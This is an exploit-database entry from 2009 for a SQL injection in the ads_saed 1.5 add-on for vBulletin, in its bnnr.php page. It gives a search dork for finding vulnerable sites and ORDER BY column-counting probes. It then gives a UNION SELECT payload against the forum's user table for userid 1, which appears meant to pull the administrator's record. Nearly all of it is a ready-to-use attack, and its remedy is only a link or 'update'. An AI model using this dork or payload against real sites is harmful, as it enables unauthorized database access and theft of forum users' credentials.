vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection

EDB-ID:

10828

CVE:

N/A

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2009-12-30

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

Mail : darkangel_G85@yahoo.com<mailto:darkangel_G85@yahoo.com>
___________________________________

## script name : ads_saed

## d0rk : inurl:"vb/bnnr.php"

## Example :


Go to url : http://server/vb/bnnr.php<http://target.com/vb/bnnr.php>

Exploit in the input "user name" blind injection

user name = ' ORDER BY 15/*

user name = ' ORDER BY 16/*

Now go to Source page  :  " Unknown column '16' in 'order clause'"


exploit :

user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*



# Solution : See here

http://www.traidnt.net/vb/showthread.php?t=1102593

or update new Product



End

IQ-SecuritY FoRuM